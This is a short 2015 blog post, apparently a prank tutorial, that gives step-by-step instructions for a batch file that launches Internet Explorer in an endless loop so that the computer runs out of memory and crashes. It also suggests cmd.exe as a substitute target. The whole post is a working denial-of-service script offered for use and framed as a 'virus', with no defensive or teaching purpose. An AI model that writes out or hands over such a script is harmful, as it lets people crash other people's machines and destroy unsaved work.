Friday, February 20, 2015

How to create a Virus(batch program) that you will open Internet Explorer infinite times?

In this post, I will explain how to create a simple batch script program that will open Internet Explorer infinite times so that the program can easily crash any computer:

1) Open Notepad and type the following:
@echo off
:eyematricx
start iexplore.exe
goto eyematricx
@echo off

2) Save the file as “eminfinite.bat”.

3) When you run the file, the batch program will start Internet Explorer infinite times so that your System crashes due to out of physical memory.

Instead of "iexplore.exe" you can type something like "cmd.exe" to open Command Prompt infinite times. 

No comments:

Post a Comment